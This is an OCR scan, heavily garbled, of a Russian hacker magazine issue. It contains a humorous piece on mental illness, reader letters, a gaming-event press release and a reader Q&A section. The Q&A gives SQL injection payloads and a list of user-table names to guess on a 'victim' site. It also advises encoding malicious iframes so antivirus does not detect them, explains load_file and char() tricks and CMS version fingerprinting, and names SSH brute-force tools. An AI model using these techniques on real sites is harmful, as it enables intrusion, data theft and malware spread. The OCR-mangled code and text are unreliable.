обстоятельны; само состояние не 
располагает ктщательному обду- 
мыванию принимаемых решений]. 
Что же касается психических забо- 
леваний, не вызванных«волщеб- 
ными колесами», маниакальный 
синдром чаще всего связывается 
с маниакально-депрессивным 
синдромом (биполярное расстрой- 
ство], который, как ни странно, 
характеризуется сменой депрес- 
сивных и маниакальныхэпизодов. 
При шизофрении такоетоже' 
бывает! Сочетание мании с бре- 
довыми идеями приводит ктому, 
что душевнобольной организм в 
однихтрусах и с электрическим 
проводом на шее выбегает из дома 
ккиоску«Пиво» итам, сбиваясь 
и глотая окончания, требует себе 
высокообогащенного плутония по 
5 рублей 40 копеекза кило.’ 

ВЕЧНЫЙ 

ДЕПРЕССНЯК 

Встречайте: всенародно признан- 
ная чумаХХІ века — депрессия! 
Депрессия едина в двухлицах и 
представляет собой и одно из прояв- 
лений заболевания, и саму болезнь. 
Иначеговоря, вотличиеотмании, 
которая представляетсобой лишь 
тройку симптомов, являющихся 
следствием разныхзаболеваний и 
злоупотреблений, депрессия может 
выступать кактриадой симптомов, 
обрати ых ма н и и , та к и са м остоятел ь- 
ным заболеванием, которое, какучит 
насзомбоящики гламурная пресса, 
косит всех — и бедных, и богатых. Так 
оно, в принципе, и есть: 7-10% (до 
25%, по разным данным] представи- 
телей взрослого населения хотя бы 
раз вжизни испытывали «депрес- 
сивный эпизод». 

Чтобы представить себе типичную 
депрессию, вовсе не обязательно 
обладать морщинистым мозгом 
Вассермана. Все ее проявления не 
слуху — стойкое снижение настрое- 
ния, бодрости, «жизненной энер- 
гии», потеря интереса кобычной 




ГЕРОЙ ДЖЕКА НИКОЛСОНА В ФИЛЬМЕ «ПРОЛЕТАЯ 
НАД ГНЕЗДОМ КУКУШКИ» СИМУЛИРУЕТУМОПО- 
МЕШАТЕЛЬСТВО И ПОПАДАЕТ В ПСИХИАТРИЧЕ- 
СКУЮ КЛИНИКУ ДЛЯ ОБСЛЕДОВАНИЯ 



работе и сексу, проблемы со сном... 
Если плясать отмании, то депрес- 
сия будет полной ее противополож- 
ностью: снижение двигательной 
активности (двигаться не хочется, 
да и зачем?], вялые невеселые 
мысли, сниженное настроение. 
Несмотря на заезженность этой 
темы, я все же попробую доставить 
тебе немного интересной инфор- 
мации. Во-первых, депрессия 

— это заболевание. То есть, нужно 
различать «депресн-я-я-кта ко- 
ой», порожденный социальными 
и личностными причинами вроде 
разгильдяйства, демотивации и 
лености — и депрессию-болезнь. 

В раздолбайстве и неумении 
веселиться (иным способом, кроме 
протупления за компьютером] ви- 
новат сам человек, а в депрессии 

— нет. Это полноценная болезнь, 
в которой не виноват никто, кроме 
неудачного расположения кое- 
какиххимических веществ и про- 
цессов в головном мозге. Именно 
поэтомулечится она не с помощью 
«эй, да ты чо, какая депрессия — 
пошли, пивка попьем, на рыбалку 
сходим. Придумаюттоже депрес- 
няков, в наше время не былота- 
кого» — не поможет. Здесь нужны 
соответствующие лекарства из 
группы антидепрессантов, часто — 
в сочетании с психотерапией. 
Депрессивный синдром, как 
следствие другой болезни, сопро- 
вождаеттакое огромное количество 
болезненныхсостояний (отши- 
зофрении до химических зависи- 
мостей], что рассказывать об этом 
никакого места в журнале не хватит. 

А ВОКРУГ ЛИКУЕТ 
ПАРАНОЙЯ 

Естьу параноика несколько • 
важных задач, решение которых 



порядочно осложняетему жизнь: 
подозрение, недоверие, озабо- 
ченностьсобственной независи- 
мостью. Рассказывать особенно 
нечего — всех подозревай, никому 
не доверяй, веди асоциальный 
образжизни (согласись, стакими 
личными качествами трудно стать 
полноценным членом общества]. 
Параноидальные идеи могут 
сопровождать кучу психических 
болезней — от алкоголизма до ши- 
зофрении, а истиннаяже паранойя 
(паранойя каксамостоятельный и 
единственный симптом) представ- 
ляетсобой болезнь отдельную. 
Люди живутс ней долго, 'не осо- 
бенно счастливо и к психиатрам 
не обращаются (было бы странно, 
если бы параноиксвоим ходом 
пошел бы сдаваться в дурдом), а 
если и попадают вполез рения 
врачей — то лечатся струдом и 
малоэффективно. 

5СНІ20: 

РАСКОЛ РАССУДКА 

Шизофрения — хроническое 
психическое заболевание, при- 
чина которого скорее неизвест- 
на, чем полностью ясна. Тем не 
менее, научные мысли на этутему 
присутствуют (ввиду обилия слов 
вроде «мезолимбический путь» 
и «дофаминергическая система» 
я их приводить не буду]. Сама 
болячка характеризуется воз- 
никновением бреда воздействия, 
галлюцинаций (в особенности 
слуховых — в виде комментирую- 
щих голосов] и ощущения «звуча- 
ния» (то есть, общедоступности] 
собственных мыслей; апатией и 
асоциальностью. Конечно, про 
заболевание, которому бородатые 
мужи посвящают целые библио- 
теки, я рассказал явно немного :]. 
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РИСУНКИ, ВЫЦАРАПАННЫЕ НАСТЕНЕ ПАЦИЕНТОМ С ДИАГНОЗОМ ШИЗОФРЕНИЯ 



ЕЁ 




«0ІСІТАІ.51ІКК01ІЫ0 РЕАЫТѴ» СИМВОЛИЗИРУЕТ 
ХАРАКТЕРНЫЕ ДЛЯ КИСЛОТЫ «СЛЫШУ ИЗОБРА- 
ЖЕНИЕ» И «ОЩУЩАЮ ЗВУК» 



ИГРЫ РАЗУМА 4 

Наша реальность устроена таким образом, что «интеллект» сам по 
себе ценностью не обладает. Чтобы он обрел социальную ценность, 
нужны желание применить его на практике, воля, чтобы осознанно 
преодолевать препятствия (а не бросать все дела из-за того, что в 
тетради склеились страницы), и мажорное настроение. 

Да, речь пойдет о распространенном утверждении, касающемся 
незаурядного ума у некоторых психически нездоровых лич- 
ностях. Действительно, некоторые шизофреники отличаются 
сохраненным (он, как таковой, и не страдает) или даже высоким 
интеллектом. Что же мешает «интеллектуальному» шизофренику 
доказывать теоремы, играть в шахматы и набирать пицот баллов в 
Іф-тесте? / 

• Апатия. Ему просто не хочетсщ Зачем все это, когда можно лежать 
в кровати вниз лицом, не обращая внимания на окружающее й не 
испытывая потребности что-л^бзѳ делась? Добавь к этому ср ци адь-^- 
ную отгороженность и активный негативизм (делфёт'віе то, что его 
просят, а наоборот), и станет ясно, что об общественной реализа- 
ции своего интеллекта речи неодет. 

• Проблемы с межличностной коммуникацией. Довольно часто у 
шизофреников имеет место «разорванность речи» — утрата грам- 
матических и логических связей между словами, употребление 
«неологизмов» (изобретенные ими самими слова, смысл которых 
никому не понятен) . В общем, «упячка негодуе» :) . 

• Прочие симптомы, вроде бреда воздействия и галлюцинаций. 

Как же тогда вообще был установлен сам факт сохраненного интел- 
лекта? Во-первых, ученые ^хитрые, парни, а во-вторых, в периоды 
ремиссии заболевания ничто нё мешает шизофреникам творить. 
Кроме того, известны случаи, когда находящийся в ступоре шизоф- 
реник вдруг вставал, подходил ^шахматному столу, обыгрывал , 
самого сильного шахматщгта иЗ числа легкобольных и снова терял 
интерес к происходящему. 




ОПРЕДЕЛЕННО, ЭТО НЕ БРИГАДА КАРАТЕЛЬНОЙ 
ПСИХИАТРИИ 



Но это не особо и важно — меди- 
цинские аспекты нас с тобой не 
интересуют, а вот«общественно- 
культурная» значимость волнует 
оченьдаже. 

Во-первых, это самое известное 
в народе расстройство, кото- 
рому часто посвящают художе- 
ственные фильмы и лженаучные 
телепередачи. Во-вторых, 
с термином «шизофрения» 
вместе часто звучит и термин 
«карательная психиатрия». К 
сожалению, совершенно за- 
служенно звучит — есть мнение, 
что термин «вялотекущая 
шизофрения» был изобретен с 
исключительно репрессивными 
целями. Помнишь, в заголов- 
ке про бред я акцентировал 
внимание на том, что не всегда 
оригинальные умозаключения 
легко можно отличить от бреда? 
Так вот, по соответствующе- 
му распоряжению никто и не 
стремился отличать: «Мыслишь 
ина ко? Добро пожаловать в 
дурдом». Кстати, карательная 
психиатрия процветала нетоль- 
ко в СССР, использовать уютные 
психиатрические клиники для 



«лечения» своих политических 
противников догадывались 
в разное время в США, на- 
цистской Германии и Франции. 

В наше время «вялотекущей 
шизофрении» больше не суще- 
ствует, по одному инакомыслию 
в дурдоме не закрывают, да и в 
целом, жить стало лучше, жить 
стало веселее. 

ЗАКЛЮЧЕНИЕ 

Если взглянуть вокруг и чуть 
подумать над статистикой, может 
показаться, что все мы окружены 
душевнобольными. Прямохоть 
выходи на улицу, размахивай 
гигантским сачком и тащи всех 
пойманныхвдомс желтыми 
окнами — неошибешься. 

В крайнем случае —там рас- 
сортируют. Тем не менее, все эти 
статистически существующие 
безумцы ловко скрываются от на- 
шего стобой недреманного ока, 
маскируются под обычных людей, 
живутс нами боко бок, посещают 
кафе и сидятза компьютером в 
соседнем офисе. Держи ухо вос- 
тро и не попадайся в их цепкие 
лапы :]. ~г 
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ОТ: 2іпаСи1іп Ідог 
< 2 ІпаЩи 1 Іп@дате 1 апсІ. . ги> 

ТЕМА: СПАМ: 5 килограммов поцелуев от 
сотрудников САМЕЬАЖ) 

Любвеобильные хедбоксы перецеловали 
всех на Красной площади ! 

Ьббр : / /шт .уоибиЬе . сот/маСсЬ? 
[сепзогеб] 



ОТ: Алексей Ардалин 
<ргбги 2 ІаЗ@дшаі 1 . сош> 

КОМУ: Ьогоѵзку Аіехапбег 
<І020ѵзку@дате1апсі. ги> 

ТЕМА: Приглашение — пресс -показ фильма 
Ноте 

[обрезано ] 

Фильм НОМЕ демонстрирует нам красоту 
планеты и последствия разрушений, нане- 
сенных деятельностью человека . Незажи- 
вающие шрамы, нанесенные Земле промыш- 
ленными производствами, последствия 
войн, экологических катастроф раскрыва- 
ют зрителю реальную ситуацию на планете . 
[обрезано ] 



ОТ: * Маіыаге * <пеѵег . апдег . ВЬе . йаскегС 
дтаі1.сот> 

КОМУ: Ьогоѵзку Аіехапбег сіогоѵзку® 
датеіапб . ги> 

ТЕМА:Шіеге із К. К??? 

Александр, добрый день! Скажи, пожалуйс- 
та, где Крис? Правда ли то, что он в Южной 
Африке? Надолго ли он там? 

Это очень важно! Ответь, пожалуйста! 



Л 



Ну. наконец-то мне разрешили комментиро- 
вать письма от коллег, которые они рассылают 
широковещательным способом на все электро- 
почты нашей редакции. Приступим-с. 

Когда я прочел это письмо в первый раз (невни- 
мательно], меня высадило на измену, поскольку 
я решил, что это хедкрабы прорвали границы 
Ксена, прорвались в наше пространство и 
перецеловали в мозжечок всехжелающих на 



Красной Площади. Чуть успокоившись, 
я справедливо рассудил (исходя из названия], 
что хедбокс — это всего лишь человеческое 
существо с коробкой на голове. Однако! 

По описанию похоже на анонимуса-угнетателя! 
Что ж, поздравим анонимуса с избавлением от 
социофобии. Раз он способен кого-то поцело- 
вать — это хороший признак. 



Пресс-релизы поступают ко мне с завидным 
постоянством, и я не вижу ни одной причины, 
чтобы обойти их своим вниманием. На фильм я, 
разумеется, не пошел, но мнение про эколо- 
гию, здоровье нации итехлюдей, которым 
сто лет назаддышалось намного вольготнее 
и здоровее, имею, и даже готов процитиро- 
вать Викентия Вересаева образца 1895 года: 
«Тяжелый и влажный, как будто липкий, воздух 
полон кислым запахом детских испражнений, 
махорки и керосина. Из всехуглов на меня 
смотрят восковые, странно неподвижные лица 
ребят с кривыми зубами, куриною грудью и 



искривленными конечностями; в их больших 
глазах нет и следа той живости и веселости, 
которая «свойственна» детям». Такая вот в 
старые времена была экология труда и условия 
жизни :]. А ведь нынче зом боя щи к учит нас, 
что, дескать, это компьютер портит детей, 
искривляетим позвоночник и делает их глаза 
слабовидящими. Может быть, оно и правда, 
ведь природа пустоты не терпит, и потому кто-то 
же должен портить шаткое здоровье челове- 
ческих детенышей? 



С Крисом вообще сложная ситуация. Не под- 
вергается сомнению тот факт, что наш самый 
краснознаменный автор и большой друг нако- 
нец-то преодолел свою социофобию и вышел в 
большой мир. Часть его похождений бездока- 
зательна и может быть причислена к разряду 
фантазий, но в Южной Африке он, кажется, 
действительно был. В США он тоже был, несмот- 
ря на некоторые проблемы с получением визы. 
Где он сейчас — незнаю, последнее известное 



мне место работы — Эндевор Секьюрити. 
Уточнить не могу — в джаббере я его уже давно 
не видел :(. Кстати, советую прочесть статью 
«Что случилось с Крисом?» в июньском номере. 
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МА6А2ШЕ(д>КЕАІ-.ХАКЕР.Ки 

И РЕДАКТОРАМ РУБРИК! 
КАЖДЫЙ МЕСЯЦ МЫ 
НАГРАЖДАЕМ АВТОРОВ 
САМОГО ДУРАЦКОГО 
И САМОГО 

КОНСТРУКТИВНОГО ПИСЬ- 
МА НОМЕРА. 



В связи с возрождением «е-таіІ»у меня 
с Андреем Матвеевым состоялась целая 
дискуссия. В ответ на мой невинный вопрос 
относительно того, нетли у него свежих писем 
от читателей, он пожаловался, что пишут 
ему в основном на тему «помоги, у меня не 
ставится юникс!» и «уа пе ѵі^Гіи гиззкіГі Ьикѵ», 
и на письма стакими сабжами он частенько 
забивает болт. Словоза слово, и поначалу 
в рамках этой рубрики я его чуть простебал 
(стыдно не отвечать читателям!], а он —уви- 
дел, пригрозил мне физической расправой и 
упрекнул меня в полном незнании его трудо- 
вой биографии. В результате продолжитель- 
ных дискуссий на этутему (пікііоз свидетель] 
все поняли, что даже мы, коллеги в течение 
почти десятка лет, многого не знаем об 
Андрее Матвееве. Ознакомься же с данными 
фактами и ты, дорогой читатель! 



• Андрей не стираеттвои письма. Просто он 
их порой игнорирует. 

• Он носит имиджевый телефон отІЧокіа, но 
не считает это убедительной характеристикой 
своей личности. Мы сами видели, что этот 
телефон выключает звук самостоятельно, 
если его перевернуть вниз экраном. Это 
развлекает. 

• Андрюшок может одновременно работать 
не на 2-х, а на 3-х ноутбуках и куче удаленных 
серверов одновременно. 

• Всегоже в личном пользовании у него име- 
ется пять ноутбуков, на 3-х из них — ѴѴіпсІоѵѵз 
Ѵізіа. Этот факт он обнародовать не стесняет- 
ся, ведь у него есть еще два ноута с ОрепБЭБ 
на борту. Тем не менее, формально, счет не в 
его пользу. 






іМОЕ 

>0 



ХРАЦКОЕ ПИСЬМО НОМЕРА 

'АФИН О РИГИ НАЛА СОХРАНЕНА) 



РВОМ : а1ех-гиз@1іѵе . ги <а1ех-гиз@1іѵе . ги> 
511 В^ ЕСТ: Вопрос по ѵізиаі Ьазіс 2008 
ТО: КізІуСзуп МкіСа <пікіСо 2 @д 1 с . ги> 



Здравствуйте уважаемый Никита. У меня такое предложение, почему 
бы вам не сделать хотя бы две странички по программированию. Я чи- 
таю ваш журнал уже два года, меня в нем все устраивает, но хотелось 
бы еще и получать новую инфу о программировании, желательно о 
ѵізиаі Ьазіс 2008. Если будут нужны сорцы обращайтесь, так как я сам 
занимаюсь программированием. 
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Привет, Алекс! 

Поздравляютебя с вручением возрожденной ПЕ-премии 
«самое дурацкое письмо номера». Быть первым в этом деле 
— большой почет, ноты его заслужил, ведь человек, два года 
читающийжурнал, нотаки незаметивший в нем 14-полос- 
ную рубрику «Коди н г», этого достоин. Да -да, две странички, 
которыеты у нас просишь — это две полосы, а в «Кодинге» их 
содержится аж 14. Наслаждайся призом, читай НС в полном 
объеме, познавай Дао. 
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23 мая в пяти московских магазинах «Эльдорадо» прошёл завер- 
шающий этап «Дня Геймера», мероприятия, организованного сетью 
«Эльдорадо» совместно с медиа компанией 6а те Іа псГ По итогам 
месяца игровые турниры посетило более 7,5 тыс. человек, активны- 
ми участниками турниров стали 4/ьіс. человек. Стоимость призово- 
го фонда составила более 1 млн. -рублей. 




«День Геймера» — масштаб- 
ное мероприятие для любите- 
лей компьютерных и видеоигр, 
в рамках которого были прове- 
дены игровые турниры, специ- 
альные акции для посетителей 
и участников. Для проведения 
турниров в магазинах были 
оборудованы специализиро- 
ванные игровые зоны: в трех 
гипермаркетах турниры прош- 
ли на РС, в двух — на игровых , 
консолях нового поколения, 7 
— ХВОХ 360. Турнирные дис- 
циплины включали в се0я 



/ / 

экшен-игры, аркады, а также 
гоночные симуляторы. 

Кроме того, в рамках «Дня 
Геймера» был представлен, 
сверхмощный компьютер Асег 
Азріге М7720, который являет- 
ся первым массовым десктопом 
нового поколения, основан- 
ным на технологии Ішеі Соге 
і,7,а также первый ноутбук, по- 
строенный на платформе Іпгеі 
7 Септпо 2 с использованием 
четырехядерного процессора 
Іпнеі Соге 2 (НР НЭХ) . 

В течение месяца в специ- 



ально оборудованных гейм- 
зонах проходили турниры по 
популярным играм: Р.Е.А.К. 
2: Ргоіесі: Огі^іп, Саіі ОГ ВиХу: 
ѴѴогЫ аі ѴѴаг, Касе Эгіѵег: СКГО, 
Сеаг5 оГ ѴѴагз 2, МоПаІ КотЪаГ 
Ѵ5. ВС ІІпіѵегзе. Также с 23 
апреля в Центре электрони- 
ки «ЭТО» (принадлежит сети 
«Эльдорадо») на Рязанском 
проспекте были выставлены 
аналоги гоночных болидов ко- 
манды ВМѴѴ-5аиЪег Р1, приве- 
зенные в Россию компаниями 
«Эльдорадо» и Ішеі. На них про- 



водились соревнования по го- 
ночным дисциплинам. В пери- 
од проведения «Дня Геймера» 
стенды с болидами посетило 
более 5 тыс. человек. «Мы 
очень довольны результатом. 
Мы ставили целью привлечь 
молодую и активную аудито- 
рию, донести до нее идею о том, 
что именно в «Эльдорадо» они 
смогут найти новейшие игро- 
вые компьютеры и эксклю- 
зивные релизы, и мы достигли 
поставленных задач. Сейчас 
мы рассматриваем вопрос о 
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расширении «Дня Геймера» за 
пределы Москвы и его прове- 
дении в регионах», — отмечает 
Тимур Чернов, руководитель 
компьютерного направления 
компании «Эльдорадо». 

«Мы от души приветствуем 
инициативу «Эльдорадо» о 
проведении Дня Геймера, — 
подчеркнул Михаил Рыбаков, 
директор пресс-службы корпо- 
рации Ігцеі в России и других 
странах СНГ. — С радостью от- 
метим отличную организацию 
этого мероприятия и большой 



интерес, который был про- 
явлен к нему со стороны пу- 
блики и масс-медиа, а также 
зрелищность и дружелюбную 
атмосферу. Хочется верить, что 
проведение подобных «Дней» 
станет доброй традицией и 
будет способствовать популя- 
ризации индустрии высоких 
технологий». 

«Компания Асег крайне до- 
вольна успешным запуском 
проекта и теми результатами, 
которым нам всем удалось до- 
биться в его рамках. Интерес 



покупательской аудитории 
к «Дню геймера» подтвердил 
верность выбранной страте- 
гии — ориентацию на игроков, 
компьютерных энтузиастов, 
которые, благодаря компании 
«Эльдорадо», возможно, впер- 
вые в рамках мероприятия 
подобного масштаба смогли 
живьем испытать компьютеры 
Асег — тщательно спроектиро- 
ванные и бережно собранные 
игровые станции. Нам прият- 
но осознавать, что наши взгля- 
ды на развитие бизнеса совпа- 



дают. Уверен, что впереди у нас 
много свершений, а это значит, 
что покупатели десктопов Асег 
в «Эльдорадо» будут доволь- 
ны», — комментирует Вячеслав 
Назаров, директор направле- 
ния настольных ПК представи- 
тельства Асег в России. 
Спонсорами «Дня Геймера» 
выступили компании ІпГеІ, 
Асег, НР, Вагшип^, «Новый 
Диск», МісгозоН, Ію^йесіі. 
Организовали праздник — 
«Эльдорадо» и медиакомпания 
Сашеіапсі. 
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2. ѴѴеЬМопеу Рауопеег (предназначена для 
оперативного снятия средств с ѴѴМ2-кошель- 
ков системы в банкоматах, подключенных к 
АТМ-сети (имеющих логотип Мазѣегса гсі) ; 

3. ѴѴеЬМопеу ѴігШаІ (предназначена для оплаты 
покупок (товаров, услуг, лицевых счетов) в 
Сети). 

Лично я пользуюсь ВапциесагсІ для обнали- 
чивания ѴѴМ2, а Рауопеег для оплаты любых 
оффлайновых покупок. 

О: Ддосят мой выделенный сервер, не знаешь 
какого-либо простого решения для защиты от 
этой мерзости? 

А: Простого решения не существует. В случае 
сильного ддоса тебе поможет лишь комплекс 
программно-аппаратных средств. Зато от сла- 
бого и среднего ддоса сможет помочь простой 
файрвол. В случае винды с этим вполне справит- 
ся АдпіШт Оиірозі: Рігеѵѵаіі, а в случае никсов, 
конечноже, іріаЫез :) А вот и скриптик, который 
сможет на краткое время облегчить твою нелег- 
кую участь (для никсов — вставлять в страницу, 
на которую идет мусорный трафик): 



<?рЬр 

$с!іг = ' /коте/уоиг-зіке . сот/ѵ\плпл;/ ' ; 

$апСіЬсЩ_соокіе = тсі5 ( * гапсіот 
ркгазе ' . декепѵ ( ' НТТР_Б5ЕК_АСЕЫТ ' ) ) ; 
$Ьап_Пі1е = ' Ьаппесі . СхС 1 ; 

іб (зСгзкг (@1і1е_дек_ 
сопСепСз ( $сііг . $Ьап_Пі1е) , $_ 

ЗЕКѴЕК [ ' ЕЕМОТЕ_АББК '))) 
ехіС ; 

$1 = Пореп ( $сііг . $_ЗЕЕѴЕЕ[ "КЕМОТЕ_ 

АББЕ"], "а"); 

бшг|||е ($1 , " зСгіпд\п" ) ; 

Ісіозе ( $1 ) ; 

$соипСег = (Зіііе ( $с!іг . $_ 

8ЕКѴЕК [ " КЕМОТЕ_АББК " ] ) ; 

іі ( ! іззеС ( $_СООКІЕ [ ' сісіоз ' ] ) ) 

зеСсоокіе ( 1 сісіоз 1 , $апкіЬок_ 
соокіе, кіше() + 3600*24*7*356); 
еізеіі ( $_СООКІЕ [ ' Лсіоз ' ] != = 
$апкіЬок_соокіе I I соипк ( $соипкег ) 

> 10) 






зузкет ( " іркаЫез -А ШРЦТ -з " . $_ 
8ЕКѴЕК. [ " ЕЕМОТЕ_АББК " ] . " -д БЮР") ; 

$1 = Іореп ( $с!іг . $Ъап_:Еі1е , "а")? 
бшгіке ( $ I , $_ЗЕКѴЕК [ ' РЕМОТЕ_ 
АББК ' ] . ' Щ ) ; 

Ісіозе ( $:Е) ; 

кеасіег ( ' ЬосаЫоп: кЫр://'. 
деккозСЪуасІсІг ( $_ЗЕКѴЕК [ "КЕМОТЕ_ 
АББК " 3 ) ) ; 

ехік ; 

} 

?> 

0: Всем хорош Соодіе Апаіуіісв, но мне не нра- 
вится, что абсолютно все данные о посетителях 
моего сайта сливаются всевидящему и всемо- 
гущему Гуглу. Не подскажешь бесплатную и не 
менее функциональную альтернативу данному 
сервису? 

А: Советую попробовать халявный рбр-скрипт 
статистики под названием Ріѵѵік [ Шр://ріѵѵік. 
огд. проект развился из известного РбрМуѴізкз]. 
Помимотого, что статистика будет работать на 
твоем собственном сервере (и, соответствен- 
но, видеть данные по своим сайтам сможешь 
только ты], скрипт впечатляет преимуществами 
и функциональностью, практически ни в чем не 
уступающей аналогичному сервису от Соодіе: 

• гибкая система плагинов; 

• открытые АРІ-интерфейсы; 

• экспорт дан ных в ХМ Ь, Э50ІѴІ, РНР, С5Ѵ; 

• использование настраиваемых виджетов в 
пользовательском интерфейсе; 

• отображение поисковых движков и ключевых 

СЛОВ; 

• подсчетпросмотренных страниц, действий и 
переходов по внешним ссылкам; 

• страны, браузеры, языки, континенты, разре- 
шения мониторов, провайдеры, разрешения 
экрана посетителей; 

• мультиюзерность, мультиязычность и муль- 
тисайты; 

• отображение Ііѵе посетителей; 

• рефералы, действия, доаіз; 

• множество видов графиков (круговые, столб- 
чатые диаграммы И Т.Д.) ; 

• отображение посетителей по местному и 
серверному времени. 



А 

О 



И это еще не все возможности тулзы! Мно- 
жество плагинов увеличивают до беско- 
нечности и так прекрасный функционал 
скрипта. Так что, советую немедленно его 
попробовать. 

0: Проводя 50І_-инъекцию в РозІдгеБОІ., стол- 
кнулся с такой проблемой: эта база данных не 
поддерживает конструкцию вида «ЫМІТ 1,1». 
Не подскажешь альтернативу? 

А: Какразтаки оператор ЫМІТ присутствуете 
РозІдгеЗСИ, но состоит из двух частей: ЫМІТ и 
0ЕЕ5ЕТ. 

ЫМІТ отвечает за количество записей, а 
0РР5ЕТ — за номерзаписи, с которой произво- 
дится выводданных. 

Наглядней смотри на следующем примере: 

зіСе . сот/іпс!ех.р]тр?ісІ=-1 ШІСЖ 
ЗЕЬЕСТ ТАВЬЕ_ЫАМЕ , ШЬЬ ЕЕОМ 
ШЕОКМАТІ(Ж_ЗСНЕМА.ТАВЕЕЗ ЫМІТ 1 
ОЕЕЗЕТ 0 -- 

Этот ЗСИ-зап рос выведетимя первойтаблицы 
из ІМЕ0ВМАТІ0І\І_5СНЕМА.ТАВЕЕ5. 

0: Нашел 50І_-инъекцию на одном сайте, но 
никак не могу подобрать имя таблицы с аккаун- 
тами пользователей. Какие наиболее распро- 
страненные имена у таких таблиц? 

А:Специально длятебятоварищака Р5ІН с 
Античата подготовил небольшой список на- 
иболее используемыхтаблиц, в которых могут 
содержаться зарегистрированные пользовате- 
ли на сайте жертвы: 

ассошіС 

ассоипСз 

асіт 

асітіп 

асітіпз 

асітіпізкгаког 

асітіпізкгакогз 

асітіпіодіп 

Іодіп 

Іодіпз 

изг 

изег 

изегз 

піск 

піскз 




О 



пате 

патез 

изгіодіп 

изг_1одіп 

изегіодіп 

изег_1одіп 

изг_пате 

из е тате 

изег_пате 

піскпате 

піск_пате 

изег_піск 

піскизег 

піск_изег 

піскизегз 

піск_изегз 

сііепк 

сііепкз 

тетЬег 

тетЬегз 

0: В последнее время мой Кгате стал палиться 
антивирусами. Подскажи, как бы его похитрее 
зашифровать. 

А: В нелегком деле шифровки ифрейма тебе 
поможет мой любимый сервис ЬНрУ/зеоІгапсе. 
сотДооІз/гесІігесІ-кгате-епсосІег [кстати, тут 
можнозашифровать нетолько ифрейм, но и 
]аѵазсгір1: и вообще любой Ыті-код]. 
Шифрование происходит следующим образом: 
каждый символ шифруемого кода ищется в 
ключе, и если находится, то заменяется на 
следующий символ ключа. Для большей скрыт- 
ности и усложнения анализа кода исходник 
расшифровщика переводится в шестнадцати- 
ричный формат. В полученном коде описывает- 
ся функция инициализатора, затем инициали- 
затору передается зашифрованая информация 
и код расшифровщика, который преобразуется 
в обычный текст; расшифровщиквыполняет 
еѵаі и запускается функция декодирования, 
находящаяся в нем, которая уже выводит рас- 
шифрованую информацию. 

В зашифрованном виде обнаружить какой-ли- 
бо вредоносный код антивирус Касперского и 
его собратья просто-напросто не могут. 

0: Слышал о каких-то системных переменных в 
Му50І_, которые могут помочь узнать дополни- 
тельную информацию о сервере при проведе- 
нии 50І_-инъекции. Расскажи поподробней. 
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А: Действительно, в МуБСИ присутствует 
такой замечательный инструмент, к^кБѴѵег 
Бузует ѴагіаЫез (за подроби 
штудировать официальный /іанѵал ЫірУ/сІеѵ. 
тѵ5д1.сот/бос/геітап/5.0//еп/5егѵег-5Ѵ5Іет- 
ѵагіаЫез.ЫтІ ). 

Системных перемен ных2:уществуют десятки, 
но наиболее полезны^ для нас будут: 

1. Ьазебіг — дирек^сфия, в которой установлен 
Му50І_; 

2. баіабітж^директория, в которых МуБСИ 
храніи<свои данные; 

^Дтрсіі г — директория для хранения времен- 
ных файлов и таблиц; 

4.ѵегзіоп_сотріІе_оз — операционная систе- 
ма, на которой работает МуБСЮ. 

Использовать эти системные переменные 
при скуль-инъекциях необходимо следующим 
образом: 




ЫЩр : / /зіСе . сот/іпсіех . р!ір?ісІ=-1 
ШІСЖ ЗЕЬЕСТ @@ЬазесІіг , 2,3/* 

Данный запрос на уязвимом сайте покажет 
нам, соответственно, установочную директо- 
рию мускула. Аналогично можно использовать 
и другие переменные из мануала. 

О: При использовании ІоасІ_ШеИ в50І_-инъек- 
циях частенько приходится заморачиваться с 
различными сервисами, помогающими пере- 
кодировать строку в сГіаг. Подскажи, как можно 
упростить этот процесс. 

А: Советую сохранить ксебе на сервер не- 
большой рбр-скрипт, содержащий удобную 
функцию перекодировки в сбап 



<?р]тр 

іипсЩіоп Сосііаг ( $зСг ) 

{ 

$геСигпзСг= ' ' ; 

іог ( $і=0 ; $і<256 ; $і++) 

{ 

$агг [сЪ.г ( $ і ) ] =$і; 

} 

іог ( $і=0 ; $і<зСг1еп ( $зСг ) ; $і++ ) 
{ 

$і ! = ( зСгІеп ($зСг) -1) 

? $геСигпзСг . = 

$агг [зиЬзСг ($зСг, $і, 1) ] . ' , 1 
: $геСигпзСг .= 

$агг [ зиЬзСг ($зСг,$і,1) ] ; 

} 

геСигп $геСигпзСг; 

} 

?> 



А вот функция, выполняющая обратное преоб- 
разование (в качестве аргумента принимает 
строку вида «12,32,53,64,25»]: 

<?рЪр 

ЕипсЦіоп ігошсііаг ( $зСг ) 

{ 

$агг2=ехр1ос!е ( ' , ' , $зСг) ; 
$геСигпзСг= ' ' ; 




0: П о д с кажищ^аіГнаДежн о определить версию 
ѴѴогсІРгез^? 

А: Очень просто! Авторы движка предоставляют 
тебе сразу несколько вариантов (во всех вари- 
антах смотри Ыті-код страницы): 

1 . 5Ііе.со ѵ кп/?іеесІ=г5з2 / 

2. зііе.соітѵѴр^сІибе^/щЛіпутсе/ѵѵр-тсе- 
Ьеір.рбр 

3. зііе.сот (зачастую просто в теге <теіа 
пате=»депегаіог» сопіепі=»ѴѴогсІРге55 [вер- 
С И я ] » / > ] 

4.зі1:е.сот/геасІте.Ы:тІ 
Э.зііе.сот/ѵѵр-абтіп/ирдгабе.рбр 
Также чисто визуально можно отличить страни- 
цы ЫірУ/зіІе.сот/ѵѵр-Іодіп.рИр . благо в ветках 
2.3.x, 2.5.x, 2.6.x, 2.7.x они разные (скачать и 
сравнить страницы входа разных версий можно 
на официальном сайте в Реіеазе Агсбіѵе Ьіір :// 
ѵѵогфгезз.огд/сІоѵѵпІоасІ/геІеазе-агсЫѵе ). 

Если же блог довольно-таки старый и версию 
узнать нельзя, то попробуй проверить сущест- 
вование файла \л/р-арр.рЬр, так как в составе 
движка он появляется только начиная с 2.2.x 
ветки. 



0: Подскажи, пожалуйста, средство для брут- 
форса 55Н. 

А: Есть несколько вариантов: 

1 . 55Н Вгиіе Рогсег ( бирУ/ѵѵѵѵѵѵ.зесигіІеат. 
сотЛоо[з/5ОР0Е2К60Е.Ьіт[ ) — чрезвычайно 
простой збеіі-скриптдля никсов. 

2. ББНаНег ( ЫіІірУ/ігегЬппеаі.пеі/р^есіг/ 
ззбаііег ] — добротно написанный на РегГе 
скрипт, который проверяетсвязки логин-па- 
роль, пытаясьзалогиниться в систему по 55Н. 
3. 55Н ВгіЛеРогсег ( Шр://ѵѵѵѵѵѵ.сІагксОсІе. 
сот/Ьгиіеіогсе ). А этот скрипт уже написан 
на Руібоп, причем помимо основной версии, 
